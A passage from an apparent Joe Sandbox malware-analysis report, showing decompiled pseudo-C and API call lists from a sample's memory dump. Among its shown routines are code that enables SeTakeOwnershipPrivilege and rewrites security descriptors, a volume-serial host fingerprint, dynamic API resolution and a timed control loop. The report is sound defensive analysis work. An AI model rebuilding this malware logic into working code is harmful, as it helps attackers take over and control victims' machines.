    								goto L10;
    							} else {
    								_t83 =  *0x3b8628; // 0x593938
    								_t39 = _t83 + 0x150; // 0x593a88
    								_push( *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x100))))(0x20,  &_v16));
    								if( *((intOrPtr*)( *_t39))() == 0) {
    									goto L11;
    								} else {
    									if(E003B1FF0(1, L"SeTakeOwnershipPrivilege", _v16) == 0) {
    										goto L11;
    									} else {
    										_t109 =  *0x3b8628; // 0x593938
    										_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x1a8))))(_a4, _t127, 1, _v8, 0, 0, 0);
    										if(_t128 != 0) {
    											goto L10;
    										} else {
    											if(E003B1FF0(0, L"SeTakeOwnershipPrivilege", _v16) == 0) {
    												goto L11;
    											} else {
    												_t94 =  *0x3b8628; // 0x593938
    												_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0x1a8))))(_a4, _t127, 4, 0, 0, _v12, 0);
    												goto L10;
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				_t63 = _v8;
    				if(_t63 != 0) {
    					_t100 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t100 + 0x154))))(_t63);
    				}
    				_t64 = _v20;
    				if(_t64 != 0) {
    					_t71 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x154))))(_t64);
    				}
    				_t65 = _v12;
    				if(_t65 != 0) {
    					_t116 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x9c))))(_t65);
    				}
    				_t66 = _v16;
    				if(_t66 != 0) {
    					_t98 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t98 + 0xf8))))(_t66);
    				}
    				return _t128;
    			}

    APIs
    • memset.MSVCRT ref: 00398128
    • SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 003981A5
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 54%
    			E0039FD15() {
    				intOrPtr _t183;
    				void* _t184;
    				void* _t187;
    				int _t194;
    				signed int* _t204;
    				int _t213;
    				int _t218;
    				int _t220;
    				int _t224;
    				int _t225;
    				int _t227;
    				int _t230;
    				void* _t232;
    				int _t236;
    				int _t237;
    				int _t239;
    				int _t241;
    				int _t242;
    				int _t243;
    				int _t244;
    				int _t248;
    				int _t249;
    				int _t253;
    				int _t255;
    				int _t261;
    				int _t267;
    				int _t269;
    				int _t270;
    				int _t272;
    				int _t282;
    				int _t287;
    				intOrPtr _t288;
    				int _t289;
    				signed int* _t299;
    				int _t302;
    				signed int _t322;
    				signed int _t325;
    				signed int _t341;
    				int _t346;
    				int _t361;
    				signed int _t363;
    				int _t374;
    				int _t376;
    				int _t377;
    				int _t378;
    				signed short* _t379;
    				int _t384;
    				signed int _t385;
    				int _t390;
    				int _t396;
    				signed int _t398;
    				signed int _t405;
    				int _t407;
    				int _t408;
    				void* _t409;
    				void* _t411;
    				int _t412;
    				void* _t413;
    				void* _t414;
    				void* _t415;
    				void* _t416;
    				void* _t417;
    				void* _t421;
    				void* _t422;
    				void* _t423;
    				void* _t427;
    
    				E0039E7D0(_t413 - 0x9c0,  *((intOrPtr*)(_t413 - 0x34))); // executed
    				_t415 = _t414 + 8;
    				_t183 = E003B1210();
    				_push(8);
    				 *0x3b8580 = _t183;
    				L0039A47E();
    				_t416 = _t415 + 4;
    				if(_t183 == _t298) {
    					_t410 = 0;
    					__eflags = 0;
    				} else {
    					_t410 = E0039E850(_t183);
    				}
    				_t184 = E00393D50(_t410); // executed
    				if(_t184 != 0) {
    					__eflags = _t410 - _t298;
    					if(__eflags != 0) {
    						E00392420(_t410);
    						_push(_t410);
    						L00391CB0();
    						_t416 = _t416 + 4;
    					}
    					_t302 =  *0x3b8628; // 0x593938
    					 *0x3b8570 = _t298;
    					 *0x3b8584 = _t298;
    					 *0x3b8574 = _t298;
    					 *0x3b8578 = _t298;
    					 *((intOrPtr*)( *((intOrPtr*)(_t302 + 0xcc))))(0x3b8594, 0x800);
    					E00391B20(_t413 - 0x5c0,  *((intOrPtr*)(_t302 + 0xcc)), __eflags);
    					_t187 = E0039BB30(_t413 - 0xc);
    					_push(0x34);
    					 *(_t413 - 0x58) = _t298;
    					 *(_t413 - 0x28) = _t298;
    					L0039A47E();
    					_t417 = _t416 + 4;
    					__eflags = _t187 - _t298;
    					if(__eflags == 0) {
    						 *(_t413 - 0x5b8) = _t298;
    					} else {
    						 *(_t413 - 0x5b8) = E003970B0(_t187);
    					}
    					E00399090(__eflags, _t413 - 0x9c0, 3);
    					E0039F550(_t413 - 0x50, _t298, _t413 - 0x9c0, 0xa, _t413 - 0x54, _t413 - 0x50);
    					E00391F00(_t413 - 0xc,  *((intOrPtr*)(_t413 - 0x54)),  *((intOrPtr*)(_t413 - 0x50))); // executed
    					_t194 = E003969F0(_t413 - 0x5b8, _t413 - 0xc, _t413 - 0x5b8); // executed
    					_t416 = _t417 + 0x24;
    					__eflags = _t194;
    					if(_t194 != 0) {
    						 *(_t413 - 0x5c0) = _t413 - 0xc;
    						__eflags = E003A0AD0(_t413 - 0x5c0,  *((intOrPtr*)( *(_t413 - 0x5b8) + 0x14)));
    						if(__eflags == 0) {
    							goto L12;
    						}
    						E00395700( *((intOrPtr*)(_t413 - 0x5bc)), __eflags);
    						 *0x3b85ac = _t298;
    						 *(_t413 - 0x30) = _t298;
    						 *(_t413 - 0x2c) = _t298;
    						 *(_t413 - 0x14) = _t298;
    						 *(_t413 - 0x10) = _t298;
    						 *(_t413 - 0x3c) = _t298;
    						 *(_t413 - 0x38) = _t298;
    						 *(_t413 - 0x44) = _t298;
    						 *(_t413 - 0x40) = _t298;
    						 *((intOrPtr*)( *( *0x3b8628)))(_t298, _t298, E003B08A0, _t413 - 0x5c0, _t298, _t413 - 0x74);
    						 *(_t413 - 0x24) = _t298;
    						while(1) {
    							_t218 =  *(_t413 - 0x5b8);
    							_t325 = 0;
    							 *0x3b857c = 0;
    							 *(_t413 - 0x20) = _t298;
    							__eflags =  *((intOrPtr*)(_t218 + 0x18)) - _t298;
    							if(__eflags <= 0) {
    								goto L79;
    							}
    							do {
    								_t384 =  *( *((intOrPtr*)(_t218 + 0x20)) + _t325 * 4);
    								_t224 = L003994D0(_t413 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t218 + 0x1c)) + _t325 * 4)), _t384); // executed
    								__eflags = _t224;
    								if(_t224 != 0) {
    									__imp___time64(_t298);
    									_t408 = _t384;
    									_t385 =  *0x3b857c; // 0x1
    									_t421 = _t416 + 4;
    									_t410 = _t224;
    									_t225 = _t224 -  *((intOrPtr*)( *((intOrPtr*)( *(_t413 - 0x5b8) + 0x24)) + _t385 * 8));
    									__eflags = _t225;
    									asm("sbb ebx, [ecx+edx*8+0x4]");
    									 *(_t413 - 0x48) = _t408;
    									if(__eflags < 0) {
    										L27:
    										_t298 = 0; // executed
    										_t227 = E003A1B80(_t410, _t413 - 0xc, _t413 - 0x5c0, _t413 - 0x28); // executed
    										_t416 = _t421 + 0xc;
    										__eflags = _t227;
    										if(_t227 == 0) {
    											 *(_t413 - 0x20) =  *(_t413 - 0x20) + 1;
    											 *( *((intOrPtr*)(_t413 - 0x5bc)) + 0xc) =  *(_t413 - 0x28);
    											_t230 = _t410 -  *(_t413 - 0x3c);
    											__eflags = _t230;
    											asm("sbb edx, [ebp-0x38]");
    											 *(_t413 - 0x48) = _t408;
    											if(__eflags < 0) {
    												L36:
    												E003942A0(__eflags, _t413 - 0x5c0); // executed
    												_t422 = _t416 + 4;
    												_t232 = E003A12C0(); // executed
    												_push(4);
    												__eflags = _t232 - _t298;
    												if(__eflags >= 0) {
    													if(__eflags != 0) {
    														_push(_t413 - 0x9c0);
    														E00399090(__eflags);
    														E00399090(__eflags, _t413 - 0xdc0, 7);
    														_push(_t413 - 0xdc0);
    														_push(_t413 - 0x9c0);
    														_push(0xe);
    														_t390 = _t413 - 0x5c0;
    														_push(_t390); // executed
    													} else {
    														_push(_t413 - 0x9c0);
    														E00399090(__eflags);
    														E00399090(__eflags, _t413 - 0xdc0, 6);
    														_push(_t413 - 0xdc0);
    														_t390 = _t413 - 0x9c0;
    														_push(_t390);
    														_push(0xe);
    														_push(_t413 - 0x5c0);
    													}
    												} else {
    													_push(_t413 - 0x9c0);
    													E00399090(__eflags);
    													E00399090(__eflags, _t413 - 0xdc0, 5);
    													_t390 = _t413 - 0xdc0;
    													_push(_t390);
    													_push(_t413 - 0x9c0);
    													_push(0xe);
    													_push(_t413 - 0x5c0);
    												}
    												_t236 = E00395A10(); // executed
    												_t423 = _t422 + 0x20;
    												 *(_t413 - 0x48) = _t298;
    												do {
    													__imp___time64(0);
    													_t410 = _t236;
    													_t237 =  *0x3b8570; // 0x0
    													_t416 = _t423 + 4;
    													_t408 = _t390;
    													__eflags = _t237 - 2;
    													if(_t237 == 2) {
    														L46:
    														_t239 = E003936E0(_t408, _t410, _t413 - 0xc, _t413 - 0x5c0,  *(_t413 - 0x14),  *(_t413 - 0x10)); // executed
    														_t416 = _t416 + 0x10;
    														asm("sbb edx, 0x0");
    														 *(_t413 - 0x14) = _t410 - 0x708;
    														 *(_t413 - 0x10) = _t408;
    														__eflags = _t239 - 1;
    														if(_t239 == 1) {
    															 *0x3b85ac = _t239;
    														}
    														L48:
    														_t241 = _t410 -  *(_t413 - 0x44);
    														__eflags = _t241;
    														asm("sbb ecx, [ebp-0x40]");
    														 *(_t413 - 0x5c) = _t408;
    														if(__eflags < 0) {
    															L55:
    															_t410 = _t410 -  *(_t413 - 0x30);
    															__eflags = _t410;
    															asm("sbb edi, [ebp-0x2c]");
    															 *(_t413 - 0x5c) = _t408;
    															if(__eflags < 0) {
    																L62:
    																_t242 = E00399890( *((intOrPtr*)(_t413 - 0x5bc)));
    																__eflags = _t242;
    																if(_t242 == 0) {
    																	L77:
    																	_t298 = 0;
    																	__eflags = 0;
    																	goto L78;
    																}
    																_push(1);
    																_push(_t413 - 0x5c0);
    																_t243 = E00395A10();
    																_t416 = _t416 + 8;
    																__eflags = _t243;
    																if(__eflags == 0) {
    																	goto L77;
    																}
    																_t390 = _t413 - 0x5c0;
    																_t244 = E00397560(_t298, __eflags, _t390);
    																_t416 = _t416 + 4;
    																__eflags = _t244;
    																if(_t244 == 0) {
    																	__eflags =  *0x3b85ac;
    																	if( *0x3b85ac != 0) {
    																		L82:
    																		E00391700(_t413 - 0xc);
    																		E0039F850(_t298, _t413 - 0x5c0);
    																		E0039C930(_t413 - 4);
    																		_t298 = 0;
    																		__eflags = 0;
    																		goto L83;
    																	}
    																	goto L77;
    																}
    																__eflags =  *0x3b85ac;
    																if( *0x3b85ac != 0) {
    																	goto L82;
    																}
    																_t248 =  *0x3b8584; // 0x1
    																_t410 = 0xa;
    																__eflags = _t248;
    																if(_t248 == 0) {
    																	_t249 =  *(_t413 - 0x24);
    																	__eflags = _t249;
    																	if(_t249 <= 0) {
    																		while(1) {
    																			L70:
    																			_t346 =  *0x3b8584; // 0x1
    																			__eflags = _t346;
    																			if(_t346 != 0) {
    																				goto L72;
    																			}
    																			_t390 =  *0x3b8628; // 0x593938
    																			 *((intOrPtr*)( *((intOrPtr*)(_t390 + 0xc8))))(0x4e20);
    																			_t410 = _t410 - 1;
    																			__eflags = _t410;
    																			if(_t410 > 0) {
    																				continue;
    																			}
    																			goto L72;
    																		}
    																		goto L72;
    																	}
    																	L69:
    																	_t253 = _t249 - 1;
    																	__eflags = _t253;
    																	 *(_t413 - 0x24) = _t253;
    																	_t410 = 1;
    																	goto L70;
    																}
    																_t141 = _t410 - 5; // 0x5
    																_t249 = _t141;
    																 *0x3b8584 = 0;
    																goto L69;
    															}
    															if(__eflags > 0) {
    																L58:
    																_t410 = E0039F2D0(_t413 - 0x5c0);
    																_t255 = E003999A0(_t298, _t413 - 0x19, _t408, _t254, _t254);
    																_push(8);
    																__eflags = _t255;
    																if(__eflags == 0) {
    																	_push(_t413 - 0x9c0);
    																	E00399090(__eflags);
    																	E00399090(__eflags, _t413 - 0xdc0, 0xa);
    																	_push(_t413 - 0xdc0);
    																	_t396 = _t413 - 0x9c0;
    																	_push(_t396);
    																	_push(0xe);
    																	_push(_t413 - 0x5c0);
    																} else {
    																	_push(_t413 - 0x9c0);
    																	E00399090(__eflags);
    																	E00399090(__eflags, _t413 - 0xdc0, 9);
    																	_t396 = _t413 - 0xdc0;
    																	_push(_t396);
    																	_push(_t413 - 0x9c0);
    																	_push(0xe);
    																	_push(_t413 - 0x5c0);
    																}
    																E00395A10();
    																_t261 = E0039BB40(_t410);
    																__imp___time64(0);
    																_t416 = _t416 + 0x28;
    																 *(_t413 - 0x30) = _t261;
    																 *(_t413 - 0x2c) = _t396;
    																goto L62;
    															}
    															__eflags = _t410 - 0x7080;
    															if(_t410 <= 0x7080) {
    																goto L62;
    															}
    															goto L58;
    														}
    														if(__eflags > 0) {
    															L51:
    															_t398 =  *0x3b857c; // 0x1
    															_t267 = _t410 -  *((intOrPtr*)( *((intOrPtr*)( *(_t413 - 0x5b8) + 0x28)) + _t398 * 8));
    															__eflags = _t267;
    															_t298 = _t408;
    															asm("sbb ebx, [ecx+edx*8+0x4]");
    															 *(_t413 - 0x5c) = _t408;
    															if(__eflags < 0) {
    																goto L55;
    															}
    															if(__eflags > 0) {
    																L54:
    																 *(_t413 - 0x44) = _t410;
    																 *(_t413 - 0x40) = _t408;
    																_t269 = E00391FE0(_t298, _t408, _t410, _t413 - 0xc, _t413 - 0x5c0, _t413 - 0x5b8); // executed
    																_t416 = _t416 + 0xc;
    																__eflags = _t269;
    																if(_t269 != 0) {
    																	_t270 = E003A0AD0(_t413 - 0x5c0,  *((intOrPtr*)( *(_t413 - 0x5b8) + 0x14)));
    																	__eflags = _t270;
    																	if(_t270 == 0) {
    																		goto L82;
    																	}
    																	 *0x3b857c = 0;
    																	goto L77;
    																}
    																goto L55;
    															}
    															__eflags = _t267 - 0x3840;
    															if(_t267 <= 0x3840) {
    																goto L55;
    															}
    															goto L54;
    														}
    														__eflags = _t241 - 0x4b0;
    														if(_t241 <= 0x4b0) {
    															goto L55;
    														}
    														goto L51;
    													}
    													_t272 = _t410 -  *(_t413 - 0x14);
    													__eflags = _t272;
    													asm("sbb ecx, [ebp-0x10]");
    													 *(_t413 - 0x5c) = _t408;
    													if(__eflags < 0) {
    														goto L48;
    													}
    													if(__eflags > 0) {
    														goto L46;
    													}
    													__eflags = _t272 - 0xe10;
    													if(_t272 <= 0xe10) {
    														goto L48;
    													}
    													goto L46;
    													L72:
    													_t236 =  *(_t413 - 0x48) + 1;
    													 *(_t413 - 0x48) = _t236;
    													__eflags = _t236 - 0x64;
    												} while (_t236 < 0x64);
    												goto L77;
    											}
    											if(__eflags > 0) {
    												L34:
    												_t282 = E0039AC90( *(_t413 - 0x5b8), _t413 - 0x5c0); // executed
    												_t416 = _t416 + 8;
    												__eflags = _t282;
    												if(__eflags == 0) {
    													goto L78;
    												}
    												 *(_t413 - 0x3c) = _t410;
    												 *(_t413 - 0x38) = _t408;
    												goto L36;
    											}
    											__eflags = _t230 - 0xe10;
    											if(__eflags <= 0) {
    												goto L36;
    											}
    											goto L34;
    										}
    										__eflags = _t227 - 1;
    										if(_t227 != 1) {
    											E0039C870(_t413 - 0x5c0, _t227);
    											_t416 = _t416 + 8;
    										}
    										_t361 =  *0x3b8628; // 0x593938
    										 *((intOrPtr*)( *((intOrPtr*)(_t361 + 0xc8))))(0x3e8);
    										goto L78;
    									}
    									if(__eflags > 0) {
    										L22:
    										_t287 = E0039D890(_t410, __eflags, _t413 - 0xc, _t413 - 0x5c0, _t413 - 0x58); // executed
    										_t421 = _t421 + 0xc;
    										__eflags = _t287;
    										if(_t287 == 0) {
    											_t288 =  *((intOrPtr*)( *(_t413 - 0x5b8) + 0x24));
    											_t363 =  *0x3b857c; // 0x1
    											 *(_t288 + _t363 * 8) = _t410;
    											_t405 =  *0x3b857c; // 0x1
    											 *(_t288 + 4 + _t405 * 8) = _t408;
    											goto L27;
    										}
    										__eflags = _t287 - 1;
    										if(_t287 != 1) {
    											E0039C870(_t413 - 0x5c0, _t287);
    											_t416 = _t421 + 8;
    										}
    										_t289 =  *0x3b8628; // 0x593938
    										 *((intOrPtr*)( *((intOrPtr*)(_t289 + 0xc8))))(0x3e8);
    										goto L77;
    									}
    									__eflags = _t225 - 0x3840;
    									if(__eflags <= 0) {
    										goto L27;
    									}
    									goto L22;
    								}
    								_t407 =  *0x3b8628; // 0x593938
    								 *((intOrPtr*)( *((intOrPtr*)(_t407 + 0xc8))))(0x3e8);
    								L78:
    								_t341 =  *0x3b857c; // 0x1
    								_t218 =  *(_t413 - 0x5b8);
    								_t325 = _t341 + 1;
    								 *0x3b857c = _t325;
    								__eflags = _t325 -  *((intOrPtr*)(_t218 + 0x18));
    							} while (__eflags < 0);
    							L79:
    							_t220 = E003B0A40(_t408, _t410, __eflags, _t413 - 0xc, _t413 - 0x5b8);
    							_t416 = _t416 + 8;
    							__eflags = _t220;
    							if(_t220 == 0) {
    								__eflags =  *(_t413 - 0x20) - _t298;
    								if(__eflags == 0) {
    									L003B0D30(_t298, _t408, _t410, __eflags, _t413 - 0xc, _t413 - 0x5c0);
    									_t416 = _t416 + 8;
    								}
    							}
    						}
    					} else {
    						L12:
    						E00391700(_t413 - 0xc);
    						E0039F850(_t298, _t413 - 0x5c0);
    						E0039C930(_t413 - 4);
    						goto L83;
    					}
    				} else {
    					E0039C930(_t413 - 4);
    					L83:
    					_t427 =  *0x3b85ac - _t298; // 0x0
    					if(_t427 == 0) {
    						L96:
    						E00399480();
    						E00397E10();
    						ExitProcess(_t298);
    					}
    					_t374 =  *0x3b8628; // 0x593938
    					_t411 = 0;
    					 *((intOrPtr*)(_t413 - 0x70)) = 0;
    					 *((intOrPtr*)(_t413 - 0x6c)) = 0;
    					 *((intOrPtr*)(_t413 - 0x68)) = 0;
    					 *((intOrPtr*)(_t413 - 0x64)) = 0;
    					 *(_t413 - 0x18) = 0;
    					 *((intOrPtr*)(_t413 - 0xb8)) = 0x44;
    					 *((intOrPtr*)( *((intOrPtr*)(_t374 + 0xb8))))(_t413 - 0xb8);
    					E00398030(_t413 - 0x18);
    					_t204 = E003A1D90(0x20a, 0);
    					_t299 = _t204;
    					if(_t299 == 0) {
    						L95:
    						_t376 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t376 + 0xd8))))( *(_t413 - 0x18), _t411, _t411, _t411, _t411, _t411, _t411, _t299, _t413 - 0xb8, _t413 - 0x70);
    						_t377 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t377 + 0xf8))))( *((intOrPtr*)(_t413 - 0x70)));
    						_t378 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t378 + 0xf8))))( *((intOrPtr*)(_t413 - 0x6c)));
    						E0039BB40( *(_t413 - 0x18));
    						_t298 = 0;
    						goto L96;
    					}
    					_t379 =  *(_t413 - 0x18);
    					_t412 = 0x104;
    					_t409 = 0;
    					while(1) {
    						_t170 = _t412 + 0x7ffffefa; // 0x7ffffffe
    						if(_t170 == 0) {
    							break;
    						}
    						_t322 =  *_t379 & 0x0000ffff;
    						if(_t322 == 0) {
    							break;
    						}
    						 *_t204 = _t322;
    						_t204 =  &(_t204[0]);
    						_t379 =  &(_t379[1]);
    						_t412 = _t412 - 1;
    						if(_t412 != 0) {
    							continue;
    						}
    						L91:
    						_t204 = _t204 - 2;
    						_t409 = 0x8007007a;
    						L92:
    						 *_t204 = 0;
    						if(_t409 >= 0) {
    							_t213 =  *0x3b8628; // 0x593938
    							 *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x1e8))))(_t299);
    						}
    						_t411 = 0;
    						goto L95;
    					}
    					__eflags = _t412;
    					if(_t412 != 0) {
    						goto L92;
    					}
    					goto L91;
    				}
    			}

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 0039FD34
      • Part of subcall function 0039E850: CoCreateInstance.OLE32(003B638C,00000000,00000001,003B617C,?), ref: 0039E8A7
      • Part of subcall function 00393D50: VariantInit.OLEAUT32(?), ref: 00396306
      • Part of subcall function 00393D50: VariantInit.OLEAUT32(?), ref: 0039631E
      • Part of subcall function 00393D50: VariantClear.OLEAUT32(?), ref: 0039642C
      • Part of subcall function 00393D50: VariantClear.OLEAUT32(?), ref: 00396432
      • Part of subcall function 00393D50: VariantClear.OLEAUT32(?), ref: 00396438
      • Part of subcall function 00393D50: VariantInit.OLEAUT32(?), ref: 00396479
      • Part of subcall function 00393D50: VariantInit.OLEAUT32(?), ref: 00396497
      • Part of subcall function 00393D50: VariantInit.OLEAUT32(?), ref: 003964B8
      • Part of subcall function 00393D50: VariantClear.OLEAUT32(?), ref: 0039658F
      • Part of subcall function 00393D50: VariantClear.OLEAUT32(?), ref: 00396598
      • Part of subcall function 00393D50: VariantClear.OLEAUT32(?), ref: 0039659E
    • ExitProcess.KERNEL32 ref: 003A04F6
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 52%
    			E00397EC0(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
    				char _v8;
    				struct HINSTANCE__* _v12;
    				char _v112;
    				short _v312;
    				struct HINSTANCE__* _t20;
    				intOrPtr _t25;
    				intOrPtr _t33;
    				void* _t38;
    				struct HINSTANCE__* _t49;
    				intOrPtr* _t50;
    				void* _t51;
    				void* _t52;
    				void* _t53;
    				void* _t54;
    
    				_t38 = 0;
    				_t51 = 0;
    				_v8 = 0;
    				E00399090(__eflags,  &_v312, 0x67);
    				_t53 = _t52 + 8;
    				_t20 = LoadLibraryW( &_v312); // executed
    				_t49 = _t20;
    				_v12 = _t49;
    				if(_t49 == 0) {
    					 *_a8 = 0;
    					return 0;
    				} else {
    					E00396CB0( &_v112, 0x68);
    					_t54 = _t53 + 8;
    					_t50 = GetProcAddress(_t49,  &_v112);
    					if(_t50 != 0) {
    						_v8 = 0x100;
    						_t33 = E003A1D90(0x100, 0);
    						_t54 = _t54 + 8;
    						_push(0);
    						_push( &_v8);
    						_t51 = _t33;
    						_push(_t51);
    						_push(_a4);
    						if( *_t50() != 0) {
    							L5:
    							_t38 = 1;
    						} else {
    							if(GetLastError() == 0x7a) {
    								_push(0);
    								_push( &_v8);
    								_push(_t51);
    								_push(_a4);
    								if( *_t50() != 0) {
    									goto L5;
    								}
    							}
    						}
    					}
    					_t25 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t25 + 0x1c))))(_v12);
    					if(_t38 != 0) {
    						 *_a8 = _t51;
    						return _t38;
    					} else {
    						if(_t51 == 0) {
    							 *_a8 = _t51;
    							return _t38;
    						} else {
    							E0039BB40(_t51);
    							 *_a8 = 0;
    							return _t38;
    						}
    					}
    				}
    			}

    APIs
    • LoadLibraryW.KERNEL32(?), ref: 00397EEB
    • GetProcAddress.KERNEL32(00000000,?), ref: 00397F11
    • GetLastError.KERNEL32 ref: 00397F44
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 88%
    			E0039F0B0(intOrPtr _a4) {
    				long _v8;
    				intOrPtr _v14;
    				signed short _v18;
    				intOrPtr _v24;
    				short _v34;
    				intOrPtr _v38;
    				short _v40;
    				char _v240;
    				short _v760;
    				void* _t46;
    				void* _t55;
    
    				_v8 = 0;
    				memset( &_v760, 0, 0x208);
    				if(GetWindowsDirectoryW( &_v760, 0x208) == 0) {
    					_v760 = 0x43;
    				}
    				_v40 = _v760;
    				_v38 = 0x5c003a;
    				_v34 = 0;
    				GetVolumeInformationW( &_v40, 0, 0,  &_v8, 0, 0, 0, 0); // executed
    				_v24 = E003B1200( &_v8);
    				E003B1200( &_v8);
    				_v18 = E003B1200( &_v8);
    				_t46 = 0;
    				do {
    					 *((char*)(_t55 + _t46 - 0xc)) = E003B1200( &_v8);
    					_t46 = _t46 + 1;
    					_t61 = _t46 - 8;
    				} while (_t46 < 8);
    				E00399090(_t61, _a4, 0xa1);
    				E00399090(_t61,  &_v240, 0xc6);
    				_push(_v14);
    				_push(_v18 & 0x0000ffff);
    				return E003A0C10(_a4, 0x64,  &_v240, _v24);
    			}

    APIs
    • memset.MSVCRT ref: 0039F0CE
    • GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 0039F0E2
    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0039F11E
      • Part of subcall function 003A0C10: _vsnwprintf.MSVCRT ref: 003A0C42
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 83%
    			E0039B3B0(void* __ebx, void* __ecx, void* __edi, int _a4) {
    				int _v8;
    				int _v12;
    				int _v16;
    				int* _v20;
    				unsigned int _v24;
    				int _v28;
    				int _v32;
    				void* _v36;
    				int _v40;
    				char _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				char _v152;
    				void* __esi;
    				int _t181;
    				intOrPtr* _t186;
    				int _t187;
    				int _t191;
    				int _t193;
    				intOrPtr _t194;
    				int _t203;
    				int _t205;
    				signed int _t206;
    				int _t212;
    				int* _t222;
    				int _t225;
    				signed int _t226;
    				intOrPtr _t230;
    				int _t231;
    				int _t235;
    				int _t238;
    				intOrPtr _t240;
    				int _t241;
    				int _t242;
    				int _t244;
    				int _t245;
    				int* _t246;
    				int _t247;
    				void* _t248;
    				int _t250;
    				int _t252;
    				int* _t254;
    				int _t257;
    				signed int _t258;
    				intOrPtr* _t261;
    				int _t263;
    				intOrPtr* _t266;
    				int _t270;
    				int _t273;
    				void* _t275;
    				int _t277;
    				int _t278;
    				int _t280;
    				int _t283;
    				long _t284;
    				void* _t286;
    				int _t287;
    				int _t288;
    				void* _t289;
    				int _t290;
    				int _t291;
    				intOrPtr* _t297;
    				int _t310;
    				int _t319;
    				int _t320;
    				int _t322;
    				intOrPtr _t327;
    				void* _t333;
    				unsigned int _t339;
    				unsigned short _t342;
    				int* _t349;
    				int* _t353;
    				int _t371;
    				intOrPtr _t374;
    				int _t384;
    				intOrPtr* _t387;
